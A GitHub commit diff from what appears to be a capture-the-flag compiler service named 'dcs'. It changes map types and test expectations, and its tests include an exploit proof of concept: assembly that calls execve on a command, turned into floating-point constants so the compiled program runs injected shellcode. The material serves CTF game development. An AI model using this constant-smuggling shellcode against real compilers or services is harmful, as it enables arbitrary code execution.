Skip to content

Commit 5ca86fe

Browse files
rkhapovkeltecc
rkhapov
authored and
keltecc
committed
[dcs] use unordered map in constants contexts to make sploit harder
1 parent 100a8f4 commit 5ca86fe

File tree

6 files changed

+128
-128
lines changed

6 files changed

+128
-128
lines changed

internal/dcs/back/lang/src/compiler/compiler.cpp

+2-2
Original file line numberDiff line numberDiff line change
@@ -52,8 +52,8 @@ class CompilerWithContext {
5252
}
5353
};
5454

55-
std::map<std::string, std::shared_ptr<ConstantCompilationContext>> constantNameToContext;
56-
std::map<std::string, std::shared_ptr<FunctionCompilationContext>> functionNameToContext;
55+
std::unordered_map<std::string, std::shared_ptr<ConstantCompilationContext>> constantNameToContext;
56+
std::unordered_map<std::string, std::shared_ptr<FunctionCompilationContext>> functionNameToContext;
5757
std::shared_ptr<FunctionCompilationContext> currentCompilationFunction;
5858
std::string emitError;
5959

internal/dcs/back/lang/tests/compiler/compiler_tests.cpp

+23-23
Original file line numberDiff line numberDiff line change
@@ -47,11 +47,11 @@ fun main() { return 0; }
4747
retq
4848
4949
50-
_c_const_main_0: .quad 0x0
51-
e: .quad 0x400599999999999a
52-
pi: .quad 0x400921fb5a7ed197
5350
x1: .quad 0x3ff3b31f84aa9f25
51+
e: .quad 0x400599999999999a
5452
x2: .quad 0xc10c97d0fc27e953
53+
_c_const_main_0: .quad 0x0
54+
pi: .quad 0x400921fb5a7ed197
5555
.sign_bit: .quad 0x8000000000000000
5656
)", "");
5757
}
@@ -157,16 +157,16 @@ fun main() {
157157
retq
158158
159159
160-
_c_const_lol_0: .quad 0x4045800000000000
161-
_c_const_lol_1: .quad 0x3ff0000000000000
162-
_c_const_lol_2: .quad 0x4045800000000000
163160
_c_const_lol_3: .quad 0x4046800000000000
164-
_c_const_main_0: .quad 0x4045000000000000
161+
_c_const_lol_2: .quad 0x4045800000000000
162+
_c_const_lol_0: .quad 0x4045800000000000
163+
x1: .quad 0x3ff3b31f84aa9f25
165164
_c_const_main_1: .quad 0x409370e4c91a90a5
166165
e: .quad 0x400599999999999a
167-
pi: .quad 0x400921fb5a7ed197
168-
x1: .quad 0x3ff3b31f84aa9f25
169166
x2: .quad 0xc10c97d0fc27e953
167+
_c_const_main_0: .quad 0x4045000000000000
168+
_c_const_lol_1: .quad 0x3ff0000000000000
169+
pi: .quad 0x400921fb5a7ed197
170170
.sign_bit: .quad 0x8000000000000000
171171
)", "");
172172
}
@@ -377,9 +377,9 @@ fun main() {
377377
retq
378378
379379
380-
_c_const_main_0: .quad 0x400921fb5a7ed197
381-
_c_const_main_1: .quad 0x400599999999999a
382380
_c_const_main_2: .quad 0x4094e40000000000
381+
_c_const_main_1: .quad 0x400599999999999a
382+
_c_const_main_0: .quad 0x400921fb5a7ed197
383383
.sign_bit: .quad 0x8000000000000000
384384
)", "");
385385
}
@@ -407,8 +407,8 @@ fun main() {
407407
retq
408408
409409
410-
_c_const_main_0: .quad 0x400921fb5a7ed197
411410
_c_const_main_1: .quad 0x400599999999999a
411+
_c_const_main_0: .quad 0x400921fb5a7ed197
412412
.sign_bit: .quad 0x8000000000000000
413413
)", "");
414414
}
@@ -526,8 +526,8 @@ fun main() {
526526
retq
527527
528528
529-
_c_const_main_0: .quad 0x400921fb5a7ed197
530529
_c_const_main_1: .quad 0x400921fb5a7ed197
530+
_c_const_main_0: .quad 0x400921fb5a7ed197
531531
.sign_bit: .quad 0x8000000000000000
532532
)", "");
533533
}
@@ -589,9 +589,9 @@ fun main() {
589589
retq
590590
591591
592-
_c_const_main_0: .quad 0x400921fb5a7ed197
593-
_c_const_main_1: .quad 0x400599999999999a
594592
_c_const_main_2: .quad 0x4094e40000000000
593+
_c_const_main_1: .quad 0x400599999999999a
594+
_c_const_main_0: .quad 0x400921fb5a7ed197
595595
.sign_bit: .quad 0x8000000000000000
596596
)", "");
597597
}
@@ -629,10 +629,10 @@ fun main() {
629629
retq
630630
631631
632-
_c_const_main_0: .quad 0x3ff0000000000000
633-
_c_const_main_1: .quad 0x4000000000000000
634632
_c_const_main_2: .quad 0x4000000000000000
633+
_c_const_main_1: .quad 0x4000000000000000
635634
_c_const_main_3: .quad 0x3ff0000000000000
635+
_c_const_main_0: .quad 0x3ff0000000000000
636636
.sign_bit: .quad 0x8000000000000000
637637
)", "");
638638
}
@@ -679,10 +679,10 @@ fun main() {
679679
retq
680680
681681
682-
_c_const_main_0: .quad 0x40091eb851eb851f
683-
_c_const_main_1: .quad 0x4008000000000000
684682
_c_const_main_2: .quad 0x3ff0000000000000
683+
_c_const_main_1: .quad 0x4008000000000000
685684
_c_const_main_3: .quad 0x4000000000000000
685+
_c_const_main_0: .quad 0x40091eb851eb851f
686686
.sign_bit: .quad 0x8000000000000000
687687
)", "");
688688
}
@@ -771,8 +771,8 @@ fun main() {
771771
retq
772772
773773
774-
_c_const_main_0: .quad 0x4014000000000000
775774
_c_const_main_1: .quad 0x4018000000000000
775+
_c_const_main_0: .quad 0x4014000000000000
776776
.sign_bit: .quad 0x8000000000000000
777777
)", "");
778778
}
@@ -815,9 +815,9 @@ R"(
815815
._0:
816816
817817
818-
_c_const_main_0: .quad 0x3ff0000000000000
819-
_c_const_main_1: .quad 0x4000000000000000
820818
_c_const_main_2: .quad 0x40091eb851eb851f
819+
_c_const_main_1: .quad 0x4000000000000000
820+
_c_const_main_0: .quad 0x3ff0000000000000
821821
.sign_bit: .quad 0x8000000000000000
822822
)", "");
823823
}
@@ -867,8 +867,8 @@ R"(
867867
retq
868868
869869
870-
_c_const_main_0: .quad 0xbff0000000000000
871870
_c_const_main_1: .quad 0xbff0000000000000
871+
_c_const_main_0: .quad 0xbff0000000000000
872872
.sign_bit: .quad 0x8000000000000000
873873
)", "");
874874
}

internal/dcs/back/lang/tests/functional_tests.cpp

+62-60
Original file line numberDiff line numberDiff line change
@@ -585,7 +585,7 @@ TEST(Vuln, DoublesFromHexParsedCorrectly) {
585585
}
586586
}
587587

588-
TEST(Vuln, DoubleFromHexParsedCorrectly2) {
588+
TEST(Vuln, GenerateVulnCode) {
589589
auto shellText = R"(
590590
.section .text
591591
.globl _start
@@ -602,9 +602,6 @@ TEST(Vuln, DoubleFromHexParsedCorrectly2) {
602602
leaq cmd(%rip), %rdi
603603
movq $59, %rax
604604
syscall
605-
pop %rax
606-
pop %rax
607-
pop %rax
608605
leaveq
609606
ret
610607
@@ -627,75 +624,80 @@ TEST(Vuln, DoubleFromHexParsedCorrectly2) {
627624

628625
auto p = reinterpret_cast<double*>(r.Translated->data());
629626

627+
std::unordered_map<std::string, std::string> nameToValue;
628+
std::vector<std::string> names;
630629
for (std::size_t i = 0; i < r.Translated->size() / sizeof(double); ++i) {
631630
std::stringstream ss;
632631
ss << std::setprecision(30) << p[i];
633-
LOG(INFO) << ss.str();
632+
auto val = ss.str();
634633
double v;
635634
ss >> v;
636635

637636
for (std::size_t j = 0; j < sizeof(double); ++j) {
638637
ASSERT_EQ((*r.Translated)[i * sizeof(double) + j], *(reinterpret_cast<uint8_t*>(&v) + j));
639638
}
639+
640+
auto name = Format("_%04x", i);
641+
names.push_back(name);
642+
nameToValue[name] = "";
640643
}
641-
}
642644

643-
TEST(Vuln, DISABLED_VulnMVP) {
644-
/*
645-
fun main() {
646-
a = 9.13311275417349147128740860176e+164;
647-
b = 2.23334226138660938778544477852e+40;
648-
c = 1.57054810607513511574371074205e+43;
649-
d = 5.70322518485311116492001613112e-306;
650-
if (a < b) {
651-
return a + b + c + d;
645+
std::size_t i = 0;
646+
for (auto &n : nameToValue) {
647+
std::stringstream ss;
648+
ss << std::setprecision(30) << p[i++];
649+
n.second = ss.str();
650+
}
651+
652+
for (auto &n : names) {
653+
LOG(INFO) << Format("%s = %s;", n.c_str(), nameToValue[n].c_str());
652654
}
653655
}
654-
*/
655-
assertProgramResult(R"(
656-
a3b5c = 9.01665960969080694903108994646e-308;
657-
a3b5d = 5.89900095836992470543979457601e-308;
658-
a3b5e = 2.94950047918496235271989728801e-308;
659-
a3b5f = -1.13962551584212620632980908507e-244;
660-
a3b5g = -11920.0000000047675712266936898;
661-
a3b5h = 1.28326448731251798597851684744e-78;
662-
a3b5i = 6.29284709594975605135792094167e-92;
663-
a3b5j = 2.1971303441320653080330698334e-152;
664-
a3b5k = 3.87546157797830208220587864688e-80;
665-
a3b5l = 2.86530687399045625656107066942e+161;
666-
a3b5m = 5.38409467802000282671150077615e+241;
667-
a3b5n = 3.11888437715206740075614361764e+161;
668-
a3b5o = 1.41894014867253636496431508459e+161;
669-
a3b5p = 4.39558737237486546973012633094e+252;
670-
a3b5q = 5.52559648449915692702815701664e+257;
671-
a3b5r = 3.4653160729132520229722030536e+185;
672-
a3b5s = 1.29503525642399536129001394637e+171;
673-
a3b5t = 8.25971437589206984708987682454e-154;
674-
a3b5u = 3.11888436252934216500734194682e+161;
675-
a3b5v = 1.41894014867253636496431508459e+161;
676-
a3b5w = 4.27255621593463064889140018959e+180;
677-
a3b5x = 3.11888404154024059066604380509e+161;
678-
a3b5y = 1.41894014867253636496431508459e+161;
679-
a3b5z = 4.39558737237486546973012633094e+252;
680-
a3b6a = 5.52559648449915692702815701664e+257;
681-
a3b6b = 3.4653160729132520229722030536e+185;
682-
a3b6c = 1.29503525642399536129001394637e+171;
683-
a3b6d = 8.25971437589206984708987682454e-154;
684-
a3b6e = 3.17556682638780341692405072892e-120;
685-
a3b6f = 7.43083922896928744450392564933e-120;
686-
a3b6g = 9.31476625042255462280623371223e+242;
687-
a3b6h = 3.98455339352822777031486764751e+252;
688-
a3b6i = 3.46513456246328025214221041058e+185;
689-
a3b6j = 1.29503525642399536129001394637e+171;
690-
a3b6k = 1.19782304862903820345902151854e+243;
691-
a3b6l = 4.45822432662471531958872096101e+252;
692-
a3b6m = 3.80282228790878296803396164557e-317;
693-
a3b6n = -6.82852348231868590359212812058e-229;
694-
695-
696-
fun main() {
697-
if (a3b6k < a3b6m) {
698-
return a3b6m;
656+
657+
TEST(Vuln, DISABLED_VulnMVP) {
658+
assertProgramResult(R"(
659+
_0000 = 4.45822432662471531958872096101e+252;
660+
_0001 = 1.19782304862903820345902151854e+243;
661+
_0002 = 1.91433085964668933099730042059e+261;
662+
_0003 = 3.98455339352822777031486764751e+252;
663+
_0004 = 9.73522563016263357401293305748e-315;
664+
_0005 = 3.88936149933469592127393174833e+174;
665+
_0006 = 3.88936149933469592127393174833e+174;
666+
_0007 = 4.45822432662471531958872096101e+252;
667+
_0008 = 5.93621147035131015845707833809e+169;
668+
_0009 = 5.52559648449915692702815701664e+257;
669+
_000a = 6.32280097505374462953932699201e+233;
670+
_000b = 8.25971437587339054081582628633e-154;
671+
_000c = 9.31476625662437923964372193661e+242;
672+
_000d = 5.93621147035131015845707833809e+169;
673+
_000e = 6.53747834600816911773243398146e-125;
674+
_000f = 6.53747834600816911773243398146e-125;
675+
_0010 = 3.9381538893456823461224877281e-62;
676+
_0011 = 3.11888404251331059194979670708e+161;
677+
_0012 = 5.52559648449915692702815701664e+257;
678+
_0013 = 3.4653160729132520229722030536e+185;
679+
_0014 = 1.29503525642399536129001394637e+171;
680+
_0015 = 1.9143324972053054017456038103e+261;
681+
_0016 = 5.52559648449915692702815701664e+257;
682+
_0017 = 1.33980497747332409769287086757e-152;
683+
_0018 = 3.88936149933469592127393174833e+174;
684+
_0019 = 4.39558737237486546973012633094e+252;
685+
_001a = 1.91429491296407703192166757816e+261;
686+
_001b = -6.82761769577296130672065869357e-229;
687+
_001c = 1.19782304862903820345902151854e+243;
688+
_001d = 1.35452787268204745946619571028e+243;
689+
_001e = -3605727437012366848;
690+
_001f = -11920.0000000052332325140014291;
691+
_0020 = -1.13962551584212620632980908507e-244;
692+
_0021 = 1.41894014867253636496431508459e+161;
693+
_0022 = 3.08856759534166243916303683284e-308;
694+
_0023 = 6.17713519068332487832607366568e-308;
695+
_0024 = 1.08805855771401084070533089734e-306;
696+
_0025 = 9.5729280743176072948036481258e-308;
697+
698+
fun main() {
699+
if (_001a < _0025) {
700+
return _0023;
699701
}
700702
}
701703
)", 0.0);

internal/dcs/back/server/src/main.cpp

+1-1
Original file line numberDiff line numberDiff line change
@@ -140,7 +140,7 @@ int main(int argc, char **argv) {
140140
}
141141
auto record = storage->Get(token);
142142
if (record->Status == Storage::OperationStatus::InvalidToken) {
143-
response.status = 400;
143+
response.status = 404;
144144
nlohmann::json j{
145145
{"status", "error"},
146146
{"message", "invalid token"}

services/dcs/back/dcsserver

-40 Bytes
Binary file not shown.

0 commit comments

Comments
 (0)